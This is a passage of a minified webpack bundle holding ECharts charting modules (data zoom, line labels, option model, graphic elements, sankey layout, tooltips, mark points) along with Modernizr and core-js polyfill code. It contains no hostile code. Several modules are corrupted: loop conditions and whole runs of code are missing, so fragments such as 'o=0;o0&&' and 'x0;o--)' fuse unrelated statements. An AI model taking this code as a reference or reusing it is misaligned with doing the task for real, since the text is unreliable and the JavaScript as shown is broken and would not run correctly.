t=o.getItemModel(e);return[+t.get("x"),+t.get("y")]})),u=[],c=[];a.fromPoints(l,u,c),c[0]-u[0]===0&&(c[0]+=1,u[0]-=1),c[1]-u[1]===0&&(c[1]+=1,u[1]-=1);var h=(c[0]-u[0])/(c[1]-u[1]),d=s(e,t,h);isNaN(h)&&(u=[d.x,d.y],c=[d.x+d.width,d.y+d.height]);var f=c[0]-u[0],p=c[1]-u[1],g=d.width,m=d.height,v=e.coordinateSystem=new i;v.zoomLimit=e.get("scaleLimit"),v.setBoundingRect(u[0],u[1],f,p),v.setViewRect(d.x,d.y,g,m),v.setCenter(e.get("center")),v.setZoom(e.get("zoom")),n.push(v)}})),n}e.exports=l},"7b3e":function(e,t,n){"use strict";var i,r=n("a3de"); +/** + * Checks if an event is supported in the current execution environment. + * + * NOTE: This will not work correctly for non-generic events such as `change`, + * `reset`, `load`, `error`, and `select`. + * + * Borrows from Modernizr. + * + * @param {string} eventNameSuffix Event name, e.g. "click". + * @param {?boolean} capture Check if the capture phase is supported. + * @return {boolean} True if the event is supported. + * @internal + * @license Modernizr 3.0.0pre (Custom Build) | MIT + */ +function o(e,t){if(!r.canUseDOM||t&&!("addEventListener"in document))return!1;var n="on"+e,o=n in document;if(!o){var a=document.createElement("div");a.setAttribute(n,"return;"),o="function"===typeof a[n]}return!o&&i&&"wheel"===e&&(o=document.implementation.hasFeature("Events.wheel","3.0")),o}r.canUseDOM&&(i=document.implementation&&document.implementation.hasFeature&&!0!==document.implementation.hasFeature("","")),e.exports=o},"7c4d":function(e,t,n){var i=n("3eba"),r=n("6d8b"),o=n("fc82"),a=n("bd9e"),s=n("6fda"),l=n("ef6a"),u=n("29a8"),c=n("2145");n("dd39");var h=u.toolbox.dataZoom,d=r.each,f="\0_ec_\0toolbox-dataZoom_";function p(e,t,n){(this._brushController=new o(n.getZr())).on("brush",r.bind(this._onBrush,this)).mount(),this._isZoomActive}p.defaultOption={show:!0,filterMode:"filter",icon:{zoom:"M0,13.5h26.9 M13.5,26.9V0 M32.1,13.5H58V58H13.5 V32.1",back:"M22,1.4L9.9,13.5l12.3,12.3 M10.3,13.5H54.9v44.6 H10.3v-26"},title:r.clone(h.title),brushStyle:{borderWidth:0,color:"rgba(0,0,0,0.2)"}};var g=p.prototype;g.render=function(e,t,n,i){this.model=e,this.ecModel=t,this.api=n,_(e,t,this,i,n),y(e,t)},g.onclick=function(e,t,n){m[n].call(this)},g.remove=function(e,t){this._brushController.unmount()},g.dispose=function(e,t){this._brushController.dispose()};var m={zoom:function(){var e=!this._isZoomActive;this.api.dispatchAction({type:"takeGlobalCursor",key:"dataZoomSelect",dataZoomSelectActive:e})},back:function(){this._dispatchZoomAction(s.pop(this.ecModel))}};function v(e){var t={};return r.each(["xAxisIndex","yAxisIndex"],(function(n){t[n]=e[n],null==t[n]&&(t[n]="all"),(!1===t[n]||"none"===t[n])&&(t[n]=[])})),t}function y(e,t){e.setIconStatus("back",s.count(t)>1?"emphasis":"normal")}function _(e,t,n,i,r){var o=n._isZoomActive;i&&"takeGlobalCursor"===i.type&&(o="dataZoomSelect"===i.key&&i.dataZoomSelectActive),n._isZoomActive=o,e.setIconStatus("zoom",o?"emphasis":"normal");var s=new a(v(e.option),t,{include:["grid"]});n._brushController.setPanels(s.makePanelOpts(r,(function(e){return e.xAxisDeclared&&!e.yAxisDeclared?"lineX":!e.xAxisDeclared&&e.yAxisDeclared?"lineY":"rect"}))).enableBrush(!!o&&{brushType:"auto",brushStyle:e.getModel("brushStyle").getItemStyle()})}g._onBrush=function(e,t){if(t.isEnd&&e.length){var n={},i=this.ecModel;this._brushController.updateCovers([]);var r=new a(v(this.model.option),i,{include:["grid"]});r.matchOutputRanges(e,i,(function(e,t,n){if("cartesian2d"===n.type){var i=e.brushType;"rect"===i?(o("x",n,t[0]),o("y",n,t[1])):o({lineX:"x",lineY:"y"}[i],n,t)}})),s.push(i,n),this._dispatchZoomAction(n)}function o(e,t,r){var o=t.getAxis(e),a=o.model,s=u(e,a,i),c=s.findRepresentativeAxisProxy(a).getMinMaxSpan();null==c.minValueSpan&&null==c.maxValueSpan||(r=l(0,r.slice(),o.scale.getExtent(),0,c.minValueSpan,c.maxValueSpan)),s&&(n[s.id]={dataZoomId:s.id,startValue:r[0],endValue:r[1]})}function u(e,t,n){var i;return n.eachComponent({mainType:"dataZoom",subType:"select"},(function(n){var r=n.getAxisModel(e,t.componentIndex);r&&(i=n)})),i}},g._dispatchZoomAction=function(e){var t=[];d(e,(function(e,n){t.push(r.clone(e))})),t.length&&this.api.dispatchAction({type:"dataZoom",from:this.uid,batch:t})},c.register("dataZoom",p),i.registerPreprocessor((function(e){if(e){var t=e.dataZoom||(e.dataZoom=[]);r.isArray(t)||(e.dataZoom=t=[t]);var n=e.toolbox;if(n&&(r.isArray(n)&&(n=n[0]),n&&n.feature)){var i=n.feature.dataZoom;o("xAxis",i),o("yAxis",i)}}function o(e,n){if(n){var i=e+"Index",o=n[i];null==o||"all"===o||r.isArray(o)||(o=!1===o||"none"===o?[]:[o]),a(e,(function(a,s){if(null==o||"all"===o||-1!==r.indexOf(o,s)){var l={type:"select",$fromToolbox:!0,filterMode:n.filterMode||"filter",id:f+e+s};l[i]=s,t.push(l)}}))}}function a(t,n){var i=e[t];r.isArray(i)||(i=i?[i]:[]),d(i,n)}}));var b=p;e.exports=b},"7c73":function(e,t,n){var i,r=n("825a"),o=n("37e8"),a=n("7839"),s=n("d012"),l=n("1be4"),u=n("cc12"),c=n("f772"),h=">",d="<",f="prototype",p="script",g=c("IE_PROTO"),m=function(){},v=function(e){return d+p+h+e+d+"/"+p+h},y=function(e){e.write(v("")),e.close();var t=e.parentWindow.Object;return e=null,t},_=function(){var e,t=u("iframe"),n="java"+p+":";return t.style.display="none",l.appendChild(t),t.src=String(n),e=t.contentWindow.document,e.open(),e.write(v("document.F=Object")),e.close(),e.F},b=function(){try{i=document.domain&&new ActiveXObject("htmlfile")}catch(t){}b=i?y(i):_();var e=a.length;while(e--)delete b[f][a[e]];return b()};s[g]=!0,e.exports=Object.create||function(e,t){var n;return null!==e?(m[f]=r(e),n=new m,m[f]=null,n[g]=e):n=b(),void 0===t?n:o(n,t)}},"7d6d":function(e,t){var n={shadowBlur:1,shadowOffsetX:1,shadowOffsetY:1,textShadowBlur:1,textShadowOffsetX:1,textShadowOffsetY:1,textBoxShadowBlur:1,textBoxShadowOffsetX:1,textBoxShadowOffsetY:1};function i(e,t,i){return n.hasOwnProperty(t)?i*e.dpr:i}e.exports=i},"7dcf":function(e,t,n){var i=n("b12f"),r=i.extend({type:"dataZoom",render:function(e,t,n,i){this.dataZoomModel=e,this.ecModel=t,this.api=n},getTargetCoordInfo:function(){var e=this.dataZoomModel,t=this.ecModel,n={};function i(e,t,n,i){for(var r,o=0;o0&&(w[0]=-w[0],w[1]=-w[1]);var S,M=f[0]<0?-1:1;if("start"!==i.__position&&"end"!==i.__position){var A=-Math.atan2(f[1],f[0]);c[0].8?"left":h[0]<-.8?"right":"center",m=h[1]>.8?"top":h[1]<-.8?"bottom":"middle";break;case"start":p=[-h[0]*_+u[0],-h[1]*b+u[1]],g=h[0]>.8?"right":h[0]<-.8?"left":"center",m=h[1]>.8?"bottom":h[1]<-.8?"top":"middle";break;case"insideStartTop":case"insideStart":case"insideStartBottom":p=[_*M+u[0],u[1]+S],g=f[0]<0?"right":"left",v=[-_*M,-S];break;case"insideMiddleTop":case"insideMiddle":case"insideMiddleBottom":case"middle":p=[k[0],k[1]+S],g="center",v=[0,-S];break;case"insideEndTop":case"insideEnd":case"insideEndBottom":p=[-_*M+c[0],c[1]+S],g=f[0]>=0?"right":"left",v=[_*M,-S];break}i.attr({style:{textVerticalAlign:i.__verticalAlign||m,textAlign:i.__textAlign||g},position:p,scale:[o,o],origin:v})}}}}function m(e,t,n){s.Group.call(this),this._createLine(e,t,n)}var v=m.prototype;v.beforeUpdate=g,v._createLine=function(e,t,n){var r=e.hostModel,o=e.getItemLayout(t),a=f(o);a.shape.percent=0,s.initProps(a,{shape:{percent:1}},r,t),this.add(a);var l=new s.Text({name:"label",lineLabelOriginalOpacity:1});this.add(l),i.each(c,(function(n){var i=d(n,e,t);this.add(i),this[h(n)]=e.getItemVisual(t,n)}),this),this._updateCommonStl(e,t,n)},v.updateData=function(e,t,n){var r=e.hostModel,o=this.childOfName("line"),a=e.getItemLayout(t),l={shape:{}};p(l.shape,a),s.updateProps(o,l,r,t),i.each(c,(function(n){var i=e.getItemVisual(t,n),r=h(n);if(this[r]!==i){this.remove(this.childOfName(n));var o=d(n,e,t);this.add(o)}this[r]=i}),this),this._updateCommonStl(e,t,n)},v._updateCommonStl=function(e,t,n){var r=e.hostModel,o=this.childOfName("line"),a=n&&n.lineStyle,l=n&&n.hoverLineStyle,h=n&&n.labelModel,d=n&&n.hoverLabelModel;if(!n||e.hasItemOption){var f=e.getItemModel(t);a=f.getModel("lineStyle").getLineStyle(),l=f.getModel("emphasis.lineStyle").getLineStyle(),h=f.getModel("label"),d=f.getModel("emphasis.label")}var p=e.getItemVisual(t,"color"),g=i.retrieve3(e.getItemVisual(t,"opacity"),a.opacity,1);o.useStyle(i.defaults({strokeNoScale:!0,fill:"none",stroke:p,opacity:g},a)),o.hoverStyle=l,i.each(c,(function(e){var t=this.childOfName(e);t&&(t.setColor(p),t.setStyle({opacity:g}))}),this);var m,v,y=h.getShallow("show"),_=d.getShallow("show"),b=this.childOfName("label");if((y||_)&&(m=p||"#000",v=r.getFormattedLabel(t,"normal",e.dataType),null==v)){var x=r.getRawValue(t);v=null==x?e.getName(t):isFinite(x)?u(x):x}var w=y?v:null,k=_?i.retrieve2(r.getFormattedLabel(t,"emphasis",e.dataType),v):null,S=b.style;if(null!=w||null!=k){s.setTextStyle(b.style,h,{text:w},{autoColor:m}),b.__textAlign=S.textAlign,b.__verticalAlign=S.textVerticalAlign,b.__position=h.get("position")||"middle";var M=h.get("distance");i.isArray(M)||(M=[M,M]),b.__labelDistance=M}b.hoverStyle=null!=k?{text:k,textFill:d.getTextColor(!0),fontStyle:d.getShallow("fontStyle"),fontWeight:d.getShallow("fontWeight"),fontSize:d.getShallow("fontSize"),fontFamily:d.getShallow("fontFamily")}:{text:null},b.ignore=!y&&!_,s.setHoverStyle(this)},v.highlight=function(){this.trigger("emphasis")},v.downplay=function(){this.trigger("normal")},v.updateLayout=function(e,t){this.setLinePoints(e.getItemLayout(t))},v.setLinePoints=function(e){var t=this.childOfName("line");p(t.shape,e),t.dirty()},i.inherits(m,s.Group);var y=m;e.exports=y},"7e63":function(e,t,n){var i=n("4e08"),r=(i.__DEV__,n("6d8b")),o=r.each,a=r.filter,s=r.map,l=r.isArray,u=r.indexOf,c=r.isObject,h=r.isString,d=r.createHashMap,f=r.assert,p=r.clone,g=r.merge,m=r.extend,v=r.mixin,y=n("e0d3"),_=n("4319"),b=n("6cb7"),x=n("8971"),w=n("e47b"),k=n("0f99"),S=k.resetSourceDefaulter,M="\0_ec_inner",A=_.extend({init:function(e,t,n,i){n=n||{},this.option=null,this._theme=new _(n),this._optionManager=i},setOption:function(e,t){f(!(M in e),"please use chart.getOption()"),this._optionManager.setOption(e,t),this.resetOption(null)},resetOption:function(e){var t=!1,n=this._optionManager;if(!e||"recreate"===e){var i=n.mountOption("recreate"===e);this.option&&"recreate"!==e?(this.restoreData(),this.mergeOption(i)):I.call(this,i),t=!0}if("timeline"!==e&&"media"!==e||this.restoreData(),!e||"recreate"===e||"timeline"===e){var r=n.getTimelineOption(this);r&&(this.mergeOption(r),t=!0)}if(!e||"recreate"===e||"media"===e){var a=n.getMediaOption(this,this._api);a.length&&o(a,(function(e){this.mergeOption(e,t=!0)}),this)}return t},mergeOption:function(e){var t=this.option,n=this._componentsMap,i=[];function r(i,r){var a=y.normalizeToArray(e[i]),s=y.mappingToExists(n.get(i),a);y.makeIdAndName(s),o(s,(function(e,t){var n=e.option;c(n)&&(e.keyInfo.mainType=i,e.keyInfo.subType=L(i,n,e.exist))}));var l=D(n,r);t[i]=[],n.set(i,[]),o(s,(function(e,r){var o=e.exist,a=e.option;if(f(c(a)||o,"Empty component definition"),a){var s=b.getClass(i,e.keyInfo.subType,!0);if(o&&o.constructor===s)o.name=e.keyInfo.name,o.mergeOption(a,this),o.optionUpdated(a,!1);else{var u=m({dependentModels:l,componentIndex:r},e.keyInfo);o=new s(a,this,this,u),m(o,u),o.init(a,this,this,u),o.optionUpdated(null,!0)}}else o.mergeOption({},this),o.optionUpdated({},!1);n.get(i)[r]=o,t[i][r]=o.option}),this),"series"===i&&E(this,n.get("series"))}S(this),o(e,(function(e,n){null!=e&&(b.hasClass(n)?n&&i.push(n):t[n]=null==t[n]?p(e):g(t[n],e,!0))})),b.topologicalTravel(i,b.getAllClassMainTypes(),r,this),this._seriesIndicesMap=d(this._seriesIndices=this._seriesIndices||[])},getOption:function(){var e=p(this.option);return o(e,(function(t,n){if(b.hasClass(n)){t=y.normalizeToArray(t);for(var i=t.length-1;i>=0;i--)y.isIdInner(t[i])&&t.splice(i,1);e[n]=t}})),delete e[M],e},getTheme:function(){return this._theme},getComponent:function(e,t){var n=this._componentsMap.get(e);if(n)return n[t||0]},queryComponents:function(e){var t=e.mainType;if(!t)return[];var n,i=e.index,r=e.id,o=e.name,c=this._componentsMap.get(t);if(!c||!c.length)return[];if(null!=i)l(i)||(i=[i]),n=a(s(i,(function(e){return c[e]})),(function(e){return!!e}));else if(null!=r){var h=l(r);n=a(c,(function(e){return h&&u(r,e.id)>=0||!h&&e.id===r}))}else if(null!=o){var d=l(o);n=a(c,(function(e){return d&&u(o,e.name)>=0||!d&&e.name===o}))}else n=c.slice();return O(n,e)},findComponents:function(e){var t=e.query,n=e.mainType,i=o(t),r=i?this.queryComponents(i):this._componentsMap.get(n);return s(O(r,e));function o(e){var t=n+"Index",i=n+"Id",r=n+"Name";return!e||null==e[t]&&null==e[i]&&null==e[r]?null:{mainType:n,index:e[t],id:e[i],name:e[r]}}function s(t){return e.filter?a(t,e.filter):t}},eachComponent:function(e,t,n){var i=this._componentsMap;if("function"===typeof e)n=t,t=e,i.each((function(e,i){o(e,(function(e,r){t.call(n,i,e,r)}))}));else if(h(e))o(i.get(e),t,n);else if(c(e)){var r=this.findComponents(e);o(r,t,n)}},getSeriesByName:function(e){var t=this._componentsMap.get("series");return a(t,(function(t){return t.name===e}))},getSeriesByIndex:function(e){return this._componentsMap.get("series")[e]},getSeriesByType:function(e){var t=this._componentsMap.get("series");return a(t,(function(t){return t.subType===e}))},getSeries:function(){return this._componentsMap.get("series").slice()},getSeriesCount:function(){return this._componentsMap.get("series").length},eachSeries:function(e,t){P(this),o(this._seriesIndices,(function(n){var i=this._componentsMap.get("series")[n];e.call(t,i,n)}),this)},eachRawSeries:function(e,t){o(this._componentsMap.get("series"),e,t)},eachSeriesByType:function(e,t,n){P(this),o(this._seriesIndices,(function(i){var r=this._componentsMap.get("series")[i];r.subType===e&&t.call(n,r,i)}),this)},eachRawSeriesByType:function(e,t,n){return o(this.getSeriesByType(e),t,n)},isSeriesFiltered:function(e){return P(this),null==this._seriesIndicesMap.get(e.componentIndex)},getCurrentSeriesIndices:function(){return(this._seriesIndices||[]).slice()},filterSeries:function(e,t){P(this);var n=a(this._componentsMap.get("series"),e,t);E(this,n)},restoreData:function(e){var t=this._componentsMap;E(this,t.get("series"));var n=[];t.each((function(e,t){n.push(t)})),b.topologicalTravel(n,b.getAllClassMainTypes(),(function(n,i){o(t.get(n),(function(t){("series"!==n||!C(t,e))&&t.restoreData()}))}))}});function C(e,t){if(t){var n=t.seiresIndex,i=t.seriesId,r=t.seriesName;return null!=n&&e.componentIndex!==n||null!=i&&e.id!==i||null!=r&&e.name!==r}}function T(e,t){var n=e.color&&!e.colorLayer;o(t,(function(t,i){"colorLayer"===i&&n||b.hasClass(i)||("object"===typeof t?e[i]=e[i]?g(e[i],t,!1):p(t):null==e[i]&&(e[i]=t))}))}function I(e){e=e,this.option={},this.option[M]=1,this._componentsMap=d({series:[]}),this._seriesIndices,this._seriesIndicesMap,T(e,this._theme.option),g(e,x,!1),this.mergeOption(e)}function D(e,t){l(t)||(t=t?[t]:[]);var n={};return o(t,(function(t){n[t]=(e.get(t)||[]).slice()})),n}function L(e,t,n){var i=t.type?t.type:n?n.subType:b.determineSubType(e,t);return i}function E(e,t){e._seriesIndicesMap=d(e._seriesIndices=s(t,(function(e){return e.componentIndex}))||[])}function O(e,t){return t.hasOwnProperty("subType")?a(e,(function(e){return e.subType===t.subType})):e}function P(e){}v(A,w);var R=A;e.exports=R},"7f59":function(e,t,n){var i=n("4e08"),r=(i.__DEV__,n("3eba")),o=n("6d8b"),a=n("e0d3"),s=n("2306"),l=n("f934"),u=n("3842"),c=u.parsePercent,h={path:null,compoundPath:null,group:s.Group,image:s.Image,text:s.Text};r.registerPreprocessor((function(e){var t=e.graphic;o.isArray(t)?t[0]&&t[0].elements?e.graphic=[e.graphic[0]]:e.graphic=[{elements:t}]:t&&!t.elements&&(e.graphic=[{elements:[t]}])}));var d=r.extendComponentModel({type:"graphic",defaultOption:{elements:[],parentId:null},_elOptionsToUpdate:null,mergeOption:function(e){var t=this.option.elements;this.option.elements=null,d.superApply(this,"mergeOption",arguments),this.option.elements=t},optionUpdated:function(e,t){var n=this.option,i=(t?n:e).elements,r=n.elements=t?[]:n.elements,s=[];this._flatten(i,s);var l=a.mappingToExists(r,s);a.makeIdAndName(l);var u=this._elOptionsToUpdate=[];o.each(l,(function(e,t){var n=e.option;n&&(u.push(n),v(e,n),y(r,t,n),_(r[t],n))}),this);for(var c=r.length-1;c>=0;c--)null==r[c]?r.splice(c,1):delete r[c].$action},_flatten:function(e,t,n){o.each(e,(function(e){if(e){n&&(e.parentOption=n),t.push(e);var i=e.children;"group"===e.type&&i&&this._flatten(i,t,e),delete e.children}}),this)},useElOptionsToUpdate:function(){var e=this._elOptionsToUpdate;return this._elOptionsToUpdate=null,e}});function f(e,t,n,i){var r=n.type,o=h.hasOwnProperty(r)?h[r]:s.getShapeClass(r),a=new o(n);t.add(a),i.set(e,a),a.__ecGraphicId=e}function p(e,t){var n=e&&e.parent;n&&("group"===e.type&&e.traverse((function(e){p(e,t)})),t.removeKey(e.__ecGraphicId),n.remove(e))}function g(e){return e=o.extend({},e),o.each(["id","parentId","$action","hv","bounding"].concat(l.LOCATION_PARAMS),(function(t){delete e[t]})),e}function m(e,t){var n;return o.each(t,(function(t){null!=e[t]&&"auto"!==e[t]&&(n=!0)})),n}function v(e,t){var n=e.exist;if(t.id=e.keyInfo.id,!t.type&&n&&(t.type=n.type),null==t.parentId){var i=t.parentOption;i?t.parentId=i.id:n&&(t.parentId=n.parentId)}t.parentOption=null}function y(e,t,n){var i=o.extend({},n),r=e[t],a=n.$action||"merge";"merge"===a?r?(o.merge(r,i,!0),l.mergeLayoutParam(r,i,{ignoreSize:!0}),l.copyLayoutParams(n,r)):e[t]=i:"replace"===a?e[t]=i:"remove"===a&&r&&(e[t]=null)}function _(e,t){e&&(e.hv=t.hv=[m(t,["left","right"]),m(t,["top","bottom"])],"group"===e.type&&(null==e.width&&(e.width=t.width=0),null==e.height&&(e.height=t.height=0)))}function b(e,t,n){var i=e.eventData;e.silent||e.ignore||i||(i=e.eventData={componentType:"graphic",componentIndex:t.componentIndex,name:e.name}),i&&(i.info=e.info)}r.extendComponentView({type:"graphic",init:function(e,t){this._elMap=o.createHashMap(),this._lastGraphicModel},render:function(e,t,n){e!==this._lastGraphicModel&&this._clear(),this._lastGraphicModel=e,this._updateElements(e),this._relocate(e,n)},_updateElements:function(e){var t=e.useElOptionsToUpdate();if(t){var n=this._elMap,i=this.group;o.each(t,(function(t){var r=t.$action,o=t.id,a=n.get(o),s=t.parentId,l=null!=s?n.get(s):i,u=t.style;"text"===t.type&&u&&(t.hv&&t.hv[1]&&(u.textVerticalAlign=u.textBaseline=null),!u.hasOwnProperty("textFill")&&u.fill&&(u.textFill=u.fill),!u.hasOwnProperty("textStroke")&&u.stroke&&(u.textStroke=u.stroke));var c=g(t);r&&"merge"!==r?"replace"===r?(p(a,n),f(o,l,c,n)):"remove"===r&&p(a,n):a?a.attr(c):f(o,l,c,n);var h=n.get(o);h&&(h.__ecGraphicWidthOption=t.width,h.__ecGraphicHeightOption=t.height,b(h,e,t))}))}},_relocate:function(e,t){for(var n=e.option.elements,i=this.group,r=this._elMap,o=t.getWidth(),a=t.getHeight(),s=0;s=0;s--){u=n[s],h=r.get(u.id);if(h){d=h.parent;var p=d===i?{width:o,height:a}:{width:d.__ecGraphicWidth,height:d.__ecGraphicHeight};l.positionElement(h,u,p,null,{hv:u.hv,boundingMode:u.bounding})}}},_clear:function(){var e=this._elMap;e.each((function(t){p(t,e)})),this._elMap=o.createHashMap()},dispose:function(){this._clear()}})},"7f72":function(e,t,n){n("6932"),n("3a56"),n("7dcf"),n("a18f"),n("32a1"),n("2c17"),n("9e87")},"7f91":function(e,t,n){var i=n("2306"),r=n("401b"),o=i.Line.prototype,a=i.BezierCurve.prototype;function s(e){return isNaN(+e.cpx1)||isNaN(+e.cpy1)}var l=i.extendShape({type:"ec-line",style:{stroke:"#000",fill:null},shape:{x1:0,y1:0,x2:0,y2:0,percent:1,cpx1:null,cpy1:null},buildPath:function(e,t){this[s(t)?"_buildPathLine":"_buildPathCurve"](e,t)},_buildPathLine:o.buildPath,_buildPathCurve:a.buildPath,pointAt:function(e){return this[s(this.shape)?"_pointAtLine":"_pointAtCurve"](e)},_pointAtLine:o.pointAt,_pointAtCurve:a.pointAt,tangentAt:function(e){var t=this.shape,n=s(t)?[t.x2-t.x1,t.y2-t.y1]:this._tangentAtCurve(e);return r.normalize(n,n)},_tangentAtCurve:a.tangentAt});e.exports=l},"7f96":function(e,t,n){var i=n("6d8b"),r=i.isFunction;function o(e,t,n){return{seriesType:e,performRawSeries:!0,reset:function(e,i,o){var a=e.getData(),s=e.get("symbol"),l=e.get("symbolSize"),u=e.get("symbolKeepAspect"),c=e.get("symbolRotate"),h=r(s),d=r(l),f=r(c),p=h||d||f,g=!h&&s?s:t,m=d?null:l;if(a.setVisual({legendSymbol:n||g,symbol:g,symbolSize:m,symbolKeepAspect:u,symbolRotate:c}),!i.isSeriesFiltered(e))return{dataEach:a.hasItemOption||p?v:null};function v(t,n){if(p){var i=e.getRawValue(n),r=e.getDataParams(n);h&&t.setItemVisual(n,"symbol",s(i,r)),d&&t.setItemVisual(n,"symbolSize",l(i,r)),f&&t.setItemVisual(n,"symbolRotate",c(i,r))}if(t.hasItemOption){var o=t.getItemModel(n),a=o.getShallow("symbol",!0),u=o.getShallow("symbolSize",!0),g=o.getShallow("symbolRotate",!0),m=o.getShallow("symbolKeepAspect",!0);null!=a&&t.setItemVisual(n,"symbol",a),null!=u&&t.setItemVisual(n,"symbolSize",u),null!=g&&t.setItemVisual(n,"symbolRotate",g),null!=m&&t.setItemVisual(n,"symbolKeepAspect",m)}}}}}e.exports=o},"7f9a":function(e,t,n){var i=n("da84"),r=n("8925"),o=i.WeakMap;e.exports="function"===typeof o&&/native code/.test(r(o))},"80f0":function(e,t){function n(e){return e}function i(e,t,i,r,o){this._old=e,this._new=t,this._oldKeyGetter=i||n,this._newKeyGetter=r||n,this.context=o}function r(e,t,n,i,r){for(var o=0;o=0;b&&_.depth>m&&(m=_.depth),y.setLayout({depth:b?_.depth:h},!0),"vertical"===o?y.setLayout({dy:n},!0):y.setLayout({dx:n},!0);for(var x=0;xh-1?m:h-1;a&&"left"!==a&&f(e,a,o,A);d="vertical"===o?(r-n)/A:(i-n)/A;g(e,d,o)}function d(e){var t=e.hostGraph.data.getRawDataItem(e.dataIndex);return null!=t.depth&&t.depth>=0}function f(e,t,n,i){if("right"===t){var o=[],a=e,s=0;while(a.length){for(var l=0;l0;o--)l*=.99,b(s,l,a),_(s,r,n,i,a),T(s,l,a),_(s,r,n,i,a)}function v(e,t){var n=[],i="vertical"===t?"y":"x",o=a(e,(function(e){return e.getLayout()[i]}));return o.keys.sort((function(e,t){return e-t})),r.each(o.keys,(function(e){n.push(o.buckets.get(e))})),n}function y(e,t,n,i,o,a){var s=1/0;r.each(e,(function(e){var t=e.length,l=0;r.each(e,(function(e){l+=e.getLayout().value}));var u="vertical"===a?(i-(t-1)*o)/l:(n-(t-1)*o)/l;u0&&(r=s.getLayout()[a]+l,"vertical"===o?s.setLayout({x:r},!0):s.setLayout({y:r},!0)),u=s.getLayout()[a]+s.getLayout()[h]+t;var f="vertical"===o?i:n;if(l=u-t-f,l>0)for(r=s.getLayout()[a]-l,"vertical"===o?s.setLayout({x:r},!0):s.setLayout({y:r},!0),u=r,d=c-2;d>=0;--d)s=e[d],l=s.getLayout()[a]+s.getLayout()[h]+t-u,l>0&&(r=s.getLayout()[a]-l,"vertical"===o?s.setLayout({x:r},!0):s.setLayout({y:r},!0)),u=s.getLayout()[a]}))}function b(e,t,n){r.each(e.slice().reverse(),(function(e){r.each(e,(function(e){if(e.outEdges.length){var i=C(e.outEdges,x,n)/C(e.outEdges,A,n);if(isNaN(i)){var r=e.outEdges.length;i=r?C(e.outEdges,w,n)/r:0}if("vertical"===n){var o=e.getLayout().x+(i-M(e,n))*t;e.setLayout({x:o},!0)}else{var a=e.getLayout().y+(i-M(e,n))*t;e.setLayout({y:a},!0)}}}))}))}function x(e,t){return M(e.node2,t)*e.getValue()}function w(e,t){return M(e.node2,t)}function k(e,t){return M(e.node1,t)*e.getValue()}function S(e,t){return M(e.node1,t)}function M(e,t){return"vertical"===t?e.getLayout().x+e.getLayout().dx/2:e.getLayout().y+e.getLayout().dy/2}function A(e){return e.getValue()}function C(e,t,n){var i=0,r=e.length,o=-1;while(++o=0){var c=a.indexOf(l),h=a.substr(u+s.length,c-u-s.length);h.indexOf("sub")>-1?i["marker"+h]={textWidth:4,textHeight:4,textBorderRadius:2,textBackgroundColor:t[h],textOffset:[3,0]}:i["marker"+h]={textWidth:10,textHeight:10,textBorderRadius:5,textBackgroundColor:t[h]},a=a.substr(c+1),u=a.indexOf("{marker")}var d=n.getModel("textStyle"),f=d.get("fontSize"),p=n.get("textLineHeight");null==p&&(p=Math.round(3*f/2)),this.el=new r({style:o.setTextStyle({},d,{rich:i,text:e,textBackgroundColor:n.get("backgroundColor"),textBorderRadius:n.get("borderRadius"),textFill:n.get("textStyle.color"),textPadding:n.get("padding"),textLineHeight:p}),z:n.get("z")}),this._zr.add(this.el);var g=this;this.el.on("mouseover",(function(){g._enterable&&(clearTimeout(g._hideTimeout),g._show=!0),g._inContent=!0})),this.el.on("mouseout",(function(){g._enterable&&g._show&&g.hideLater(g._hideDelay),g._inContent=!1}))},setEnterable:function(e){this._enterable=e},getSize:function(){var e=this.el.getBoundingRect();return[e.width,e.height]},moveTo:function(e,t){if(this.el){var n=this._styleCoord;a(n,this._zr,e,t),this.el.attr("position",[n[0],n[1]])}},hide:function(){this.el&&this.el.hide(),this._show=!1},hideLater:function(e){!this._show||this._inContent&&this._enterable||(e?(this._hideDelay=e,this._show=!1,this._hideTimeout=setTimeout(i.bind(this.hide,this),e)):this.hide())},isShow:function(){return this._show},dispose:function(){clearTimeout(this._hideTimeout),this.el&&this._zr.remove(this.el)},getOuterSize:function(){var e=this.getSize();return{width:e[0],height:e[1]}}};var l=s;e.exports=l},8344:function(e,t,n){var i=n("6d8b"),r=n("f706"),o=n("3842"),a=n("6179"),s=n("923d"),l=n("88f0");function u(e,t,n){var i=t.coordinateSystem;e.each((function(r){var a,s=e.getItemModel(r),l=o.parsePercent(s.get("x"),n.getWidth()),u=o.parsePercent(s.get("y"),n.getHeight());if(isNaN(l)||isNaN(u)){if(t.getMarkerPosition)a=t.getMarkerPosition(e.getValues(e.dimensions,r));else if(i){var c=e.get(i.dimensions[0],r),h=e.get(i.dimensions[1],r);a=i.dataToPoint([c,h])}}else a=[l,u];isNaN(l)||(a[0]=l),isNaN(u)||(a[1]=u),e.setItemLayout(r,a)}))}var c=l.extend({type:"markPoint",updateTransform:function(e,t,n){t.eachSeries((function(e){var t=e.markPointModel;t&&(u(t.getData(),e,n),this.markerGroupMap.get(e.id).updateLayout(t))}),this)},renderSeries:function(e,t,n,o){var a=e.coordinateSystem,s=e.id,l=e.getData(),c=this.markerGroupMap,d=c.get(s)||c.set(s,new r),f=h(a,e,t);t.setData(f),u(t.getData(),e,o),f.each((function(e){var n=f.getItemModel(e),r=n.getShallow("symbol"),o=n.getShallow("symbolSize"),a=n.getShallow("symbolRotate"),s=i.isFunction(r),u=i.isFunction(o),c=i.isFunction(a);if(s||u||c){var h=t.getRawValue(e),d=t.getDataParams(e);s&&(r=r(h,d)),u&&(o=o(h,d)),c&&(a=a(h,d))}f.setItemVisual(e,{symbol:r,symbolSize:o,symbolRotate:a,color:n.get("itemStyle.color")||l.getVisual("color")})})),d.updateData(f),this.group.add(d.group),f.eachItemGraphicEl((function(e){e.traverse((function(e){e.dataModel=t}))})),d.__keep=!0,d.group.silent=t.get("silent")||e.get("silent")}});function h(e,t,n){var r;r=e?i.map(e&&e.dimensions,(function(e){var n=t.getData().getDimensionInfo(t.getData().mapDimension(e))||{};return i.defaults({name:e},n)})):[{name:"value",type:"float"}];var o=new a(r,n),l=i.map(n.get("data"),i.curry(s.dataTransform,t));return e&&(l=i.filter(l,i.curry(s.dataFilter,e))),o.initData(l,null,e?s.dimValueGetter:function(e){return e.value}),o}e.exports=c},"83ab":function(e,t,n){var i=n("d039");e.exports=!i((function(){return 7!=Object.defineProperty({},1,{get:function(){return 7}})[1]}))},"83ba":function(e,t,n){var 